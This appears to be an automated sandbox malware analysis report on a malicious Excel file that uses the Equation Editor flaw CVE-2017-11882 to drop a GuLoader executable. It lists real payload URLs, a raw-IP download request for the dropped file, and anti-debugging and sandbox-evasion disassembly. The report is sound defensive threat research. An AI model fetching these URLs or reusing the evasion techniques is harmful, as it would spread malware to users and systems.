Windows Analysis Report
listing new.xlsx

Overview

General Information

Sample Name: listing new.xlsx
Analysis ID: 557639
MD5: 4aae6390327810b9cb4055320ea85c31
SHA1: aec6f3bfebe0e92c2d9d16c2fc50e7ab06349a8a
SHA256: 7830f70d3c66ebdb8bcd854c46efd02c4689fd952f0f701029b14c2c37ee1bc0
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: 00000004.00000002.678614834.0000000003750000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://dariamob.ro/wed/eee_XScUCMEVL"}
Source: listing new.xlsx Virustotal: Detection: 37%
Source: listing new.xlsx ReversingLabs: Detection: 34%
Source: http://50.16.4.125/E/raki.exe Avira URL Cloud: Label: malware

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405C49
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406873 FindFirstFileW,FindClose, 4_2_00406873
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B

Software Vulnerabilities

Source: global traffic TCP traffic: 192.168.2.22:49165 -> 50.16.4.125:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 52MB

Networking

Source: Malware configuration extractor URLs: https://dariamob.ro/wed/eee_XScUCMEVL
Source: Joe Sandbox View ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Jan 2022 11:37:30 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.14Last-Modified: Thu, 20 Jan 2022 12:11:37 GMTETag: "236f8-5d6026772cefd"Accept-Ranges: bytesContent-Length: 145144Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: GET /E/raki.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 50.16.4.125Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe.2.dr, raki[1].exe.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vbc.exe.2.dr, raki[1].exe.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vbc.exe.2.dr, raki[1].exe.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vbc.exe.2.dr, raki[1].exe.2.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: vbc.exe.2.dr, raki[1].exe.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vbc.exe.2.dr, raki[1].exe.2.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.676925104.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.463627479.000000000040A000.00000008.00020000.sdmp, vbc.exe.2.dr, raki[1].exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe.2.dr, raki[1].exe.2.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: vbc.exe.2.dr, raki[1].exe.2.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: vbc.exe, 00000004.00000002.677115561.0000000001DB0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.677115561.0000000001DB0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe.2.dr, raki[1].exe.2.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe.2.dr, raki[1].exe.2.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CED38AF1.emf

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\Public\vbc.exe Code function: 4_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_004056DE

System Summary

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_0040352D
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040755C 4_2_0040755C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406D85 4_2_00406D85
Source: C:\Users\Public\vbc.exe Code function: 4_2_729A1BFF 4_2_729A1BFF
Source: C:\Users\Public\vbc.exe Code function: 4_2_03755F78 4_2_03755F78
Source: C:\Users\Public\vbc.exe Code function: 4_2_03757148 4_2_03757148
Source: C:\Users\Public\vbc.exe Code function: 4_2_0375452E 4_2_0375452E
Source: C:\Users\Public\vbc.exe Code function: 4_2_0375490A 4_2_0375490A
Source: C:\Users\Public\vbc.exe Code function: 4_2_037541E4 4_2_037541E4
Source: C:\Users\Public\vbc.exe Code function: 4_2_037507E3 4_2_037507E3
Source: C:\Users\Public\vbc.exe Code function: 4_2_037551C4 4_2_037551C4
Source: C:\Users\Public\vbc.exe Code function: 4_2_03755DB5 4_2_03755DB5
Source: C:\Users\Public\vbc.exe Code function: 4_2_03754FBC 4_2_03754FBC
Source: C:\Users\Public\vbc.exe Code function: 4_2_0375599B 4_2_0375599B
Source: C:\Users\Public\vbc.exe Code function: 4_2_0375567B 4_2_0375567B
Source: C:\Users\Public\vbc.exe Code function: 4_2_03757A67 4_2_03757A67
Source: C:\Users\Public\vbc.exe Code function: 4_2_0375466B 4_2_0375466B
Source: C:\Users\Public\vbc.exe Code function: 4_2_03757652 4_2_03757652
Source: C:\Users\Public\vbc.exe Code function: 4_2_03755E4E 4_2_03755E4E
Source: C:\Users\Public\vbc.exe Code function: 4_2_03757E25 4_2_03757E25
Source: C:\Users\Public\vbc.exe Code function: 4_2_03756E15 4_2_03756E15
Source: C:\Users\Public\vbc.exe Code function: 4_2_037580D9 4_2_037580D9
Source: C:\Users\Public\vbc.exe Code function: 4_2_03756CCB 4_2_03756CCB
Source: C:\Users\Public\vbc.exe Code function: 4_2_0375629E 4_2_0375629E
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: listing new.xlsx Virustotal: Detection: 37%
Source: listing new.xlsx ReversingLabs: Detection: 34%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$listing new.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE926.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/21@0/1
Source: C:\Users\Public\vbc.exe Code function: 4_2_004021AA CoCreateInstance, 4_2_004021AA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 4_2_0040498A
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation

Source: Yara match File source: 00000004.00000002.678614834.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Users\Public\vbc.exe Code function: 4_2_729A30C0 push eax; ret 4_2_729A30EE
Source: C:\Users\Public\vbc.exe Code function: 4_2_03750353 push 92DC45CCh; ret 4_2_03750352
Source: C:\Users\Public\vbc.exe Code function: 4_2_03750542 pushad ; retf 4_2_03750546
Source: C:\Users\Public\vbc.exe Code function: 4_2_03752B48 push ebx; retf 4_2_03752B49
Source: C:\Users\Public\vbc.exe Code function: 4_2_03754115 push cs; ret 4_2_03754124
Source: C:\Users\Public\vbc.exe Code function: 4_2_03754115 push ebx; iretd 4_2_037541E3
Source: C:\Users\Public\vbc.exe Code function: 4_2_037541A1 push ebx; iretd 4_2_037541E3
Source: C:\Users\Public\vbc.exe Code function: 4_2_03750798 push esp; ret 4_2_037507AE
Source: C:\Users\Public\vbc.exe Code function: 4_2_03751986 push ebx; iretd 4_2_0375198B
Source: C:\Users\Public\vbc.exe Code function: 4_2_03753070 push 8175DDB0h; ret 4_2_03753076
Source: C:\Users\Public\vbc.exe Code function: 4_2_03754047 push ebp; iretd 4_2_03754053
Source: C:\Users\Public\vbc.exe Code function: 4_2_03753029 push ebx; ret 4_2_0375303D
Source: C:\Users\Public\vbc.exe Code function: 4_2_03750C10 pushfd ; retf 4_2_03750C11
Source: C:\Users\Public\vbc.exe Code function: 4_2_03750219 push 92DC45CCh; ret 4_2_03750352
Source: C:\Users\Public\vbc.exe Code function: 4_2_03752807 push esp; retf 4_2_03752810
Source: C:\Users\Public\vbc.exe Code function: 4_2_037502F7 push 92DC45CCh; ret 4_2_03750352
Source: C:\Users\Public\vbc.exe Code function: 4_2_037506D7 push edx; ret 4_2_037506D8
Source: C:\Users\Public\vbc.exe Code function: 4_2_729A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 4_2_729A1BFF

Persistence and Installation Behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsj734E.tmp\System.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000003757598 second address: 0000000003757598 instructions: 0x00000000 rdtsc 0x00000002 mov eax, E840912Fh 0x00000007 xor eax, 7A8A25B6h 0x0000000c xor eax, E8404D81h 0x00000011 xor eax, 7A8AF919h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F7440E86D88h 0x0000001e lfence 0x00000021 mov edx, 2E6725F1h 0x00000026 add edx, 02DF62A2h 0x0000002c xor edx, 717DB16Fh 0x00000032 xor edx, 3FC539E8h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test al, al 0x0000003f cmp si, 2DCDh 0x00000044 test edx, edx 0x00000046 test al, 03h 0x00000048 ret 0x00000049 sub edx, esi 0x0000004b ret 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F7440E86D68h 0x0000005d test edx, edx 0x0000005f cmp ah, ch 0x00000061 call 00007F7440E86DCAh 0x00000066 call 00007F7440E86DA9h 0x0000006b lfence 0x0000006e mov edx, 2E6725F1h 0x00000073 add edx, 02DF62A2h 0x00000079 xor edx, 717DB16Fh 0x0000007f xor edx, 3FC539E8h 0x00000085 mov edx, dword ptr [edx] 0x00000087 lfence 0x0000008a test al, al 0x0000008c cmp si, 2DCDh 0x00000091 test edx, edx 0x00000093 test al, 03h 0x00000095 ret 0x00000096 mov esi, edx 0x00000098 pushad 0x00000099 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2820 Thread sleep time: -360000s >= -30000s
Source: C:\Users\Public\vbc.exe Code function: 4_2_037575E7 rdtsc 4_2_037575E7
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405C49
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406873 FindFirstFileW,FindClose, 4_2_00406873
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B
Source: C:\Users\Public\vbc.exe API call chain: ExitProcess graph end node
Source: vbc.exe, 00000004.00000002.677054111.00000000008D4000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging

Source: C:\Users\Public\vbc.exe Code function: 4_2_729A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 4_2_729A1BFF
Source: C:\Users\Public\vbc.exe Code function: 4_2_037575E7 rdtsc 4_2_037575E7
Source: C:\Users\Public\vbc.exe Code function: 4_2_0375374E mov eax, dword ptr fs:[00000030h] 4_2_0375374E
Source: C:\Users\Public\vbc.exe Code function: 4_2_0375452E mov eax, dword ptr fs:[00000030h] 4_2_0375452E
Source: C:\Users\Public\vbc.exe Code function: 4_2_037539E7 mov eax, dword ptr fs:[00000030h] 4_2_037539E7
Source: C:\Users\Public\vbc.exe Code function: 4_2_03757C3A mov eax, dword ptr fs:[00000030h] 4_2_03757C3A
Source: C:\Users\Public\vbc.exe Code function: 4_2_03757E25 mov eax, dword ptr fs:[00000030h] 4_2_03757E25
Source: C:\Users\Public\vbc.exe Code function: 4_2_03757223 mov eax, dword ptr fs:[00000030h] 4_2_03757223
Source: C:\Users\Public\vbc.exe Code function: 4_2_03753A11 mov eax, dword ptr fs:[00000030h] 4_2_03753A11
Source: C:\Users\Public\vbc.exe Code function: 4_2_03756E03 mov eax, dword ptr fs:[00000030h] 4_2_03756E03
Source: C:\Users\Public\vbc.exe Code function: 4_2_0375588D mov eax, dword ptr fs:[00000030h] 4_2_0375588D
Source: C:\Users\Public\vbc.exe Code function: 4_2_03758A91 RtlAddVectoredExceptionHandler, 4_2_03758A91

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: vbc.exe, 00000004.00000002.677080565.00000000009B0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.677080565.00000000009B0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000004.00000002.677080565.00000000009B0000.00000002.00020000.sdmp Binary or memory string: Program Manager<
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_0040352D